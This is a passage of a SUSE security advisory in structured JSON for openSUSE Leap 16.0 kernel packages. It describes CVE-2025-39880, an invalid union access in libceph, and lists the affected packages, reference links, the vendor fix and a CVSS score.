"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-39829"
},
{
"cve": "CVE-2025-39880",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39880"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix invalid accesses to ceph_connection_v1_info\n\nThere is a place where generic code in messenger.c is reading and\nanother place where it is writing to con-\u003ev1 union member without\nchecking that the union member is active (i.e. msgr1 is in use).\n\nOn 64-bit systems, con-\u003ev1.auth_retry overlaps with con-\u003ev2.out_iter,\nso such a read is almost guaranteed to return a bogus value instead of\n0 when msgr2 is in use. This ends up being fairly benign because the\nside effect is just the invalidation of the authorizer and successive\nfetching of new tickets.\n\ncon-\u003ev1.connect_seq overlaps with con-\u003ev2.conn_bufs and the fact that\nit\u0027s being written to can cause more serious consequences, but luckily\nit\u0027s not something that happens often.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39880",
"url": "https://www.suse.com/security/cve/CVE-2025-39880"
},
{
"category": "external",
"summary": "SUSE Bug 1250388 for CVE-2025-39880",
"url": "https://bugzilla.suse.com/1250388"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
